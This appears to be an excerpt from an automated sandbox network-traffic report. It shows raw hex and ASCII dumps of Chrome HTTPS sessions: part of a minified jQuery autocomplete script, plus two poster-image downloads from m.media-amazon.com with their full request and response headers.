                                                                                                                                                                                          Data Ascii: s.tabDisabled===!1)return;break;case h.RETURN:if(b.selectedIndex===-1)return void b.hide();b.select(b.selectedIndex);break;case h.UP:b.moveUp();break;case h.DOWN:b.moveDown();break;default:return}a.stopImmediatePropagation(),a.preventDefault()}},onKeyUp:f
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 6e 28 61 29 7b 72 65 74 75 72 6e 20 67 28 61 2c 62 2c 66 29 7d 29 7d 2c 68 26 26 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 3e 68 26 26 28 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 3d 63 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 73 6c 69 63 65 28 30 2c 68 29 29 2c 63 7d 2c 67 65 74 53 75 67 67 65 73 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 2c 67 3d 74 68 69 73 2c 68 3d 67 2e 6f 70 74 69 6f 6e 73 2c 69 3d 68 2e 73 65 72 76 69 63 65 55 72 6c 3b 69 66 28 68 2e 70 61 72 61 6d 73 5b 68 2e 70 61 72 61 6d 4e 61 6d 65 5d 3d 62 2c 68 2e 6f 6e 53 65 61 72 63 68 53 74 61 72 74 2e 63 61 6c 6c 28 67 2e 65 6c 65 6d 65 6e 74 2c 68 2e 70 61 72 61 6d 73 29 21 3d 3d 21 31 29 7b 69 66 28 64 3d 68 2e 69 67 6e 6f 72 65
                                                                                                                                                                                          Data Ascii: n(a){return g(a,b,f)})},h&&c.suggestions.length>h&&(c.suggestions=c.suggestions.slice(0,h)),c},getSuggestions:function(b){var c,d,e,f,g=this,h=g.options,i=h.serviceUrl;if(h.params[h.paramName]=b,h.onSearchStart.call(g.element,h.params)!==!1){if(d=h.ignore
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 74 65 64 49 6e 64 65 78 3d 2d 31 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 62 2e 6f 6e 43 68 61 6e 67 65 54 69 6d 65 6f 75 74 29 2c 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2e 68 69 64 65 28 29 2c 62 2e 73 69 67 6e 61 6c 48 69 6e 74 28 6e 75 6c 6c 29 7d 2c 73 75 67 67 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 76 6f 69 64 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 68 6f 77 4e 6f 53 75 67 67 65 73 74 69 6f 6e 4e 6f 74 69 63 65 3f 74 68 69 73 2e 6e 6f 53 75 67 67 65 73 74 69 6f 6e 73 28 29 3a 74 68 69 73 2e 68 69 64 65 28 29 29 3b 76 61 72 20 62 2c 63 3d 74 68 69 73 2c 64 3d 63 2e 6f 70 74 69 6f 6e 73 2c 65 3d 64 2e
                                                                                                                                                                                          Data Ascii: tedIndex=-1,clearTimeout(b.onChangeTimeout),a(b.suggestionsContainer).hide(),b.signalHint(null)},suggest:function(){if(!this.suggestions.length)return void(this.options.showNoSuggestionNotice?this.noSuggestions():this.hide());var b,c=this,d=c.options,e=d.
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 66 6c 65 78 22 3d 3d 3d 64 2e 77 69 64 74 68 26 26 65 2e 63 73 73 28 22 77 69 64 74 68 22 2c 22 22 29 7d 2c 66 69 6e 64 42 65 73 74 48 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 74 68 69 73 2c 63 3d 62 2e 65 6c 2e 76 61 6c 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 64 3d 6e 75 6c 6c 3b 63 26 26 28 61 2e 65 61 63 68 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 65 3d 30 3d 3d 3d 62 2e 76 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 63 29 3b 72 65 74 75 72 6e 20 65 26 26 28 64 3d 62 29 2c 21 65 7d 29 2c 62 2e 73 69 67 6e 61 6c 48 69 6e 74 28 64 29 29 7d 2c 73 69 67 6e 61 6c 48 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d
                                                                                                                                                                                          Data Ascii: flex"===d.width&&e.css("width","")},findBestHint:function(){var b=this,c=b.el.val().toLowerCase(),d=null;c&&(a.each(b.suggestions,function(a,b){var e=0===b.value.toLowerCase().indexOf(c);return e&&(d=b),!e}),b.signalHint(d))},signalHint:function(b){var c=
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 69 66 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 21 3d 3d 2d 31 29 72 65 74 75 72 6e 20 30 3d 3d 3d 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3f 28 61 28 62 2e 73 75 67 67 65 73 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 22 2b 62 2e 63 6c 61 73 73 65 73 2e 73 75 67 67 65 73 74 69 6f 6e 29 2e 66 69 72 73 74 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 62 2e 63 6c 61 73 73 65 73 2e 73 65 6c 65 63 74 65 64 29 2c 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 2d 31 2c 62 2e 69 67 6e 6f 72 65 56 61 6c 75 65 43 68 61 6e 67 65 3d 21 31 2c 62 2e 65 6c 2e 76 61 6c 28 62 2e 63 75 72 72 65 6e 74 56 61 6c 75 65 29 2c 76 6f 69 64 20 62 2e 66 69 6e 64 42 65 73 74 48 69 6e 74 28 29 29 3a 76 6f 69 64 20 62 2e 61 64 6a 75 73
                                                                                                                                                                                          Data Ascii: if(b.selectedIndex!==-1)return 0===b.selectedIndex?(a(b.suggestionsContainer).children("."+b.classes.suggestion).first().removeClass(b.classes.selected),b.selectedIndex=-1,b.ignoreValueChange=!1,b.el.val(b.currentValue),void b.findBestHint()):void b.adjus


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          9192.168.2.1649722151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC676OUTGET /images/M/MV5BMDdmZGU3NDQtY2E5My00ZTliLWIzOTUtMTY4ZGI1YjdiNjk3XkEyXkFqcGdeQXVyNTA4NzY1MzY@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 37893
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: f656fb5f-02db-44f7-b84d-e6fc0313d740
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 02 Oct 2016 16:03:19 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 09 Oct 2044 16:04:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2231429
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000048-IAD, cache-ewr-kewr1740022-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bf 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 01 02 08 00 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 2f 58 5f 1c e9 e6 7a 50 94 67 91 5e be 60
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4/X_zPg^`
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: f4 57 15 8b 1f a0 bc 09 df 5c dd be ca 59 95 f4 62 51 01 a2 d2 38 e1 7c 0a 27 85 b1 4b 29 e0 15 77 4f 66 db fb de db de d7 6d b1 ef 67 66 ad d5 ce da 79 4c a6 d5 15 b5 d9 0d d6 ce da 6d a8 fc 1b 84 55 02 1d f3 2c 96 03 d5 ca eb 4c b6 bf 3a 7b 26 be c8 77 bf ce af a1 dc 9d b8 df 4f 4e eb e5 35 76 8d 39 2e 3b 06 07 a3 45 40 22 d9 5d f3 30 51 c2 09 95 d9 aa cd 94 d9 3d 9b 6f 9f 7b 61 8e 44 be 2a b6 cc 56 05 c6 9a a9 8e 9e df 3b 27 07 20 96 57 94 35 97 cb b5 8b e5 12 cf 57 23 8d 33 e3 90 f6 6b f4 67 9f 44 7e 5e 75 ef 93 e8 74 d2 62 4b 58 f9 46 fb be 51 9b 86 bb 01 22 9a d9 5e 39 8a c9 36 5b c9 6f 8e 52 51 1d b1 b2 3b ec e1 66 cb 6c 25 34 35 ac 96 f2 3b ec bb e0 ce 95 89 09 7b 5f 23 11 f2 9c d6 c9 1c 49 25 7a b9 56 f6 a9 3a be d5 1a f5 1d 60 3a eb cd d0 9d 9d
                                                                                                                                                                                          Data Ascii: W\YbQ8|'K)wOfmgfyLmU,L:{&wON5v9.;E@"]0Q=o{aD*V;' W5W#3kgD~^utbKXFQ"^96[oRQ;fl%45;{_#I%zV:`:
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 2d 43 8d a5 5a ea d2 f3 22 b2 03 d5 f6 d1 75 1f 36 01 45 b3 9e 72 9d bb b5 a4 1e 01 e0 6c d1 11 24 76 b0 15 e6 ab 34 ad a9 0a 69 80 74 73 5d b5 e9 89 77 b1 17 0e 96 94 0c 33 fc 5c 37 4d a3 a1 06 ba 2b b0 24 d2 d6 6c b6 89 fb 65 fd 8d 31 7c 8f b1 b2 ba a3 ec 5c 7b 44 88 f2 0b 22 0f b6 d7 d8 6d 9d 37 c7 de 70 ae cc bc ba 5b 6b 8d f7 db 67 68 ac 43 bc 0c 58 87 ba b2 f0 cf d5 0e b6 c5 5c c7 df 1c f7 23 7c 41 44 10 5c 1f ff c4 00 31 10 00 02 02 01 03 03 02 05 03 03 05 01 00 00 00 00 01 02 00 03 11 04 12 21 10 13 31 05 22 14 20 32 33 41 06 23 30 34 42 51 15 24 43 44 61 52 ff da 00 08 01 01 00 01 08 02 b2 ac 91 35 6d 80 14 04 98 0b c9 dc 22 ed 33 b5 36 c6 7e 31 3c c4 ae 00 90 76 e6 c5 3e 1a 97 1e 0b 62 63 33 4a 80 a4 d9 b0 c6 dc 1b 10 bf f8 4a 4d 9f 53 e9 95 27
                                                                                                                                                                                          Data Ascii: -CZ"u6Erl$v4its]w3\7M+$le1|\{D"m7p[kghCX\#|AD\1!1" 23A#04BQ$CDaR5m"36~1<v>bc3JJMS'
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 4d 1a 62 b5 86 37 f9 0d ef 8a 62 99 6d 7b 7d c2 ff 00 f3 34 f7 f7 87 24 43 04 5a f1 36 4b d3 89 a9 1c c3 0c 51 10 45 8a 66 66 89 f2 b8 84 66 11 0f ca 63 54 22 ae d3 91 66 76 4b 17 74 35 fe 05 69 b5 b1 34 e3 08 b0 f1 33 88 e3 3c 8d d9 82 f0 3c fc 62 78 97 b0 3f 4f 79 ab e4 69 35 63 52 21 5e 95 dd 99 9c cd 43 00 a4 cb 8e 72 7a 62 2a c4 13 10 74 a2 de d3 66 25 81 a1 84 4c 74 c4 b6 d1 5e 32 75 82 7c 46 41 88 73 2c fa 4c 5f c9 9a 3a b9 6b 0f 96 cc 41 80 21 8c 92 d6 ed f3 2c d4 ef 31 c1 f3 2d ab b6 a3 6a 38 56 c9 b2 c5 75 85 5a 92 08 d3 eb 7b c3 06 12 27 7e 5d 63 34 71 08 81 22 24 54 9b 66 d9 89 89 55 a6 b8 96 6e ea 44 c4 b1 37 09 b3 f0 c0 45 38 8c f9 0d 12 7d 78 ad 75 08 01 a5 04 3d 35 6f bc 91 05 6b fd d7 80 de d1 f8 c4 a9 53 3e f1 68 3e 31 f9 8a 99 94 5a de
                                                                                                                                                                                          Data Ascii: Mb7bm{}4$CZ6KQEfffcT"fvKt5i43<<bx?Oyi5cR!^Crzb*tf%Lt^2u|FAs,L_:kA!,1-j8VuZ{'~]c4q"$TfUnD7E8}xu=5okS>h>1Z
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 97 8d b0 7a 2f 20 41 e9 e9 b5 2c 2b a6 4a c6 a4 dd a8 f4 c4 d2 f7 99 e9 f4 ce f8 0e 3f d1 be 93 2d d1 1a 95 cc d1 69 06 a0 5a 62 e8 4b f6 da 59 47 6a b5 b2 37 a5 80 c7 23 d2 ec dc 04 af 40 c7 02 23 1d 1f 6e d1 4d c3 1b 97 ab 73 3d 50 ff 00 b7 26 29 f9 c4 df bd f7 0f 59 b8 3b 0a 55 46 65 94 6c aa 8b 3a 58 f8 f6 c2 65 5a 8b 29 04 27 fa 85 fc 99 f1 76 e1 96 2e be f5 c6 17 5f 72 9c 8a b5 76 53 bb 6a 6b ee 4f 15 df aa dd dd 15 be a6 a0 15 6d 37 3a fb f4 f7 bd 39 d9 f1 56 02 48 36 12 bb 67 c6 5b cc 6d 6d be ec b7 a8 5d e4 db 71 60 01 f4 fd 5f c3 9c 35 6d 8f 6f c9 ae a3 bd 5b 28 b4 e0 39 8b c8 f9 33 d2 f6 18 d9 35 ba af 85 fd c3 e7 24 c7 d4 6f a6 9a e1 6d b0 ff 00 06 9f ee 24 a8 61 17 28 3c e5 be 96 97 fe 20 3d 3c 43 ce 21 87 a7 a7 6a ff 00 e0 74 72 78 33 44 4e
                                                                                                                                                                                          Data Ascii: z/ A,+J?-iZbKYGj7#@#nMs=P&)Y;UFel:XeZ)'v._rvSjkOm7:9VH6g[mm]q`_5mo[(935$om$a(< =<C!jtrx3DN
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: cc 09 6e 65 da ab 2a 30 0b 53 6c fd e9 ba ef 71 83 bd cc ad 2e 0a 30 56 d2 ea 67 ee cf dd cc 56 b5 b3 87 73 58 01 b7 59 e6 7b d7 26 1d e3 99 70 62 c3 29 b4 7b db 4b 67 18 1f 8d d3 d4 2c b2 a7 18 19 73 c3 1c 1c 12 43 6e 31 c4 3e 62 fd b5 95 8e 5e 38 e6 27 e2 69 fe 9a e1 fc 4c 66 d8 7c c3 13 ea b6 13 ef 48 e0 f1 2d fa 5e 7f 74 ab c9 33 f1 54 fc cd f9 7b eb 87 c4 ac 60 08 7e b1 0f e7 32 a0 79 8d 5e f7 13 1e 04 b7 c4 69 ab 3e e5 95 85 dd 05 cd 5f 10 15 b0 2b 42 a1 fc 98 1d b1 b2 57 e5 41 db bf c6 9f 73 b6 1a ba b3 81 1a 8d a1 8c ec 9e 26 cc 05 30 69 ff 00 10 52 5a 57 b9 9d c1 f8 73 16 93 37 dd cb 05 a8 9d a4 f6 98 e3 2d 4b 71 3b 2f 98 16 cc b4 34 b8 da b0 d3 60 9f 0c 41 63 02 da 79 95 ef 3d c8 6a b3 31 c5 82 6c b6 3e fa c7 14 ef 72 66 2c e6 35 6f e2 61 db 99
                                                                                                                                                                                          Data Ascii: ne*0Slq.0VgVsXY{&pb){Kg,sCn1>b^8'iLf|H-^t3T{`~2y^i>_+BWAs&0iRZWs7-Kq;/4`Acy=j1l>rf,5oa
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: d9 09 f7 28 4a 13 b1 08 f3 ac d6 01 28 99 8b 06 a2 cc cb fb f8 2b e2 ae 6d f4 7f ad 4a 95 2b c6 2c 15 f9 19 53 29 b7 3f d6 81 94 44 0f e4 ac af 15 2a 63 c5 66 cd 78 7c a1 04 e4 e4 c9 8c 8e 4a e3 cc b9 54 3a 79 d7 c6 b2 bc 6b dc 2b 0a 09 51 71 96 31 56 a1 8f 98 20 a8 5a fe 50 0e c1 cd c6 7e 0b 9c d8 31 e7 4c a8 1d 3c 54 d2 e0 c3 1a 87 83 70 cd 6c 4d 2e 2a 85 10 4c 99 75 e8 13 d9 97 17 ef c6 6e 33 f0 5c f2 30 26 65 c8 81 d2 2b 7d 4d 28 d4 ae a3 81 3a 86 a6 aa 61 b1 d4 51 f7 2b e2 36 4d 44 2d e2 aa 03 e0 80 41 05 f1 b7 f8 ec 9b a8 70 c0 32 c0 f6 3b f6 8a 84 c2 2a 0c b3 7e e0 b8 05 42 f5 0b 92 65 f9 06 6f 0b 8a 8c 15 c1 56 52 78 39 3d 4c 07 8b f1 ac d4 ca 80 50 81 ba b2 5b 63 7f d3 36 72 95 af f3 1c 35 44 c8 1d 43 42 04 a1 32 f1 93 32 1c 79 38 b9 df 13 9e 26
                                                                                                                                                                                          Data Ascii: (J(+mJ+,S)?D*cfx|JT:yk+Qq1V ZP~1L<TplM.*Lun3\0&e+}M(:aQ+6MD-Ap2;*~BeoVRx9=LP[c6r5DCB22y8&
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 97 cc 42 67 30 4b 61 2e e3 37 d0 89 8f 68 16 bb b0 ed 74 6c 26 51 d4 ae a6 ab 82 4c 64 a3 c0 c5 00 81 a7 8e 6b 18 80 25 c0 b7 02 80 3f 02 0c d2 04 37 00 65 36 b7 e7 4d 81 30 f7 de 06 10 98 4d 98 57 9e 15 00 1f 86 3c 41 bd ff 00 15 4a c7 42 a6 a0 26 59 89 95 91 83 2e 45 0e be 64 95 cc a1 09 10 3c 2d d9 53 b0 26 84 d8 cd 8c d8 83 37 69 cc 1e ae 08 c3 99 8b 3f 8d b9 cb 87 43 c1 9c c2 4c 0b 0c 55 ee 3d 41 f7 07 dc 1e fb 8f d7 b3 10 4f 13 13 87 5f 0b b2 90 68 cd 3b 55 c1 dc 7a 83 ee 7f 7f 80 fd 7b 38 a2 3b 03 46 64 ac d8 c6 51 70 3c be de 07 9e 26 02 cf 89 8f a1 8d aa 5f 34 7c 6d 34 68 5a bd f2 45 8e 54 73 4c 3d 94 73 3c 6d 3c 6d 31 b9 c6 db 1c d8 74 6b 17 53 df 6f 29 96 48 81 fe a1 c9 5c 42 4c f2 40 f1 9c 0e 48 34 b5 19 c3 4d be 2a 21 c9 71 b2 8a b8 5e e8 8c
                                                                                                                                                                                          Data Ascii: Bg0Ka.7htl&QLdk%?7e6M0MW<AJB&Y.Ed<-S&7i?CLU=AO_h;Uz{8;FdQp<&_4|m4hZETsL=s<m<m1tkSo)H\BL@H4M*!q^
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 19 ba c2 6e b3 ef 51 c5 64 30 25 69 ff 00 68 da 6e 59 46 d0 31 ce 96 a3 b4 a9 00 36 26 1c 5a 12 03 18 71 5b 25 f9 7e 8a 7c eb 16 fd 0a 85 c6 87 aa 74 51 01 da 42 1c bb 04 5f 55 2e c4 bb cc d7 94 7a 9d 93 b1 0c 9c 8c 4e 8d d3 f2 ee 94 84 ca 3f 86 63 54 db 3c 80 86 56 ed 16 d8 bc d8 26 39 82 d6 a7 8f 11 e9 cd cb 5d 0f 60 c9 50 c0 3a a5 69 e3 ea bd 54 2e ec 62 d3 52 b3 39 b8 6d 92 8b 00 c6 a7 a5 6b eb e9 20 57 7a b5 65 80 f6 b3 59 9d a4 20 6d 0f 6c f3 64 94 d5 b8 1c fa 3e 5a 53 0e 69 92 e6 99 cf 2d 0d 5a a6 fc a7 e4 d0 3f 5e c2 11 11 ee df 76 9d 86 0b e9 d5 72 9f 65 ea bd bb 1d 02 d3 62 6a 24 02 db 72 0c 8b 05 97 59 3b 10 ff 00 c6 c4 b1 6f 22 9c 04 26 4a 91 6c e3 b5 56 c8 69 a5 f4 c1 e6 18 45 1d 9c 28 b4 cb 4e cf 92 ce b7 a6 73 dd cf ba 73 da fd 57 e7 b6 d9
                                                                                                                                                                                          Data Ascii: nQd0%ihnYF16&Zq[%~|tQB_U.zN?cT<V&9]`P:iT.bR9mk WzeY mld>ZSi-Z?^vrebj$rY;o"&JlViE(NssW
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: d1 c3 9b 11 67 2a c8 bb 3c 11 e8 f9 d0 b1 5e c4 f7 2c 4d 6b 16 26 18 b1 4d 32 e2 05 69 a9 10 eb af 4e 84 e4 26 80 7b 7d d8 c1 32 1c cd 71 93 2f c5 9c 5c 98 70 ce fe 29 87 f0 4c b3 f9 93 2e 22 78 4e 5b 1c bf 81 5a ac bb d2 ec 35 64 83 a5 51 fc f1 ce 3a be 27 ea ab b3 f7 74 ae f3 41 b1 ad d1 f4 cc 10 a0 8e 79 60 b3 60 82 90 ea 78 f1 1d 54 e9 af 09 6d fb 13 a3 cc 11 9b dd af 4a 76 48 cd f4 46 2c 34 5e 24 9d 00 c0 9d dc e4 af 09 63 7a b5 8e 32 54 e9 d9 da 80 83 2d 6d 5f 27 15 f1 38 21 16 8b 59 e1 04 cc 58 65 f9 b1 90 73 9a 23 41 8e 19 85 dd 22 36 c3 8b 1b 75 75 3c 23 65 3f 2a e7 99 6a ea 56 59 9d 3e 3f 89 95 00 0b ae e6 cb 91 8e 32 f0 b4 46 a4 cc 5f de b0 3a 5c 54 3a 9e 76 77 ab 57 98 ef c1 e7 3b f0 7c 46 f7 aa 05 67 15 f2 71 54 e9 3a 2f dc 17 90 af 93 8a f8
                                                                                                                                                                                          Data Ascii: g*<^,Mk&M2iN&{}2q/\p)L."xN[Z5dQ:'tAy``xTmJvHF,4^$cz2T-m_'8!YXes#A"6uu<#e?*jVY>?2F_:\T:vwW;|FgqT:/


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          10192.168.2.1649724151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC676OUTGET /images/M/MV5BZWQyYmRlYzItZTdiYS00MmIwLThkMGMtMGJjYzQ0NThmNTMyXkEyXkFqcGdeQXVyNzM0MDQ1Mw@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:55 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 30397
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 8e4849f0-2ac0-4f27-a792-7f21a8d1d585
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Tue, 05 Apr 2016 06:06:38 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 03:25:13 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2812780
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:55 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200035-IAD, cache-ewr-kewr1740031-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c0 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 00 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d8 1e 07 62 46 30 8a 63 be f7 43 82 e7
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5bF0cC
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1378INData Raw: 2d 28 76 97 38 78 ff 00 47 01 ab 8e aa 7a d8 5a c0 8f bf 7a af 2e 69 06 a6 d7 21 6b 0c 99 ad d3 6a d0 e7 b9 cb e9 17 98 b4 e6 68 61 7a 58 3e 77 ea f3 6d 2c d7 71 d5 dc 0f 46 ea c1 22 68 4b a2 cb d5 6b 36 c1 a0 2f ca 2b 66 a3 04 9c 95 76 dd 67 7b 4e 7a 96 ab b4 c2 df 32 98 b7 55 11 50 e0 0c 36 09 e1 81 9a c0 f2 86 9a ca ba 63 70 c7 db df 3c bf 7e be b0 5d 98 8b ac aa 5c 98 3d 1f 09 69 26 95 dd e4 7b 5c e4 5d 72 ab 36 70 7b ce 5f 48 9c d1 a4 73 4e f8 52 f6 dd 37 a0 3a 09 d0 e0 69 95 f9 bf 54 95 c8 d6 c5 d9 29 94 64 6f 81 89 84 4d f3 4e f6 df 68 67 74 3a 36 8d d8 46 6e 35 9d 90 dc ff 00 2a 96 95 cf 48 81 b2 5e c0 64 8e e0 40 a6 62 82 a8 ac 18 c2 fa 59 06 b6 22 f2 fd 74 4f 88 dc 26 be ac 6e 1a 8f b2 8b bd e7 f3 e3 6c f5 56 99 cb 55 1d 35 f0 7c 2a 58 8c d9 a5
                                                                                                                                                                                          Data Ascii: -(v8xGzZz.i!kjhazX>wm,qF"hKk6/+fvg{Nz2UP6cp<~]\=i&{\]r6p{_HsNR7:iT)doMNhgt:6Fn5*H^d@bY"tO&nlVU5|*X
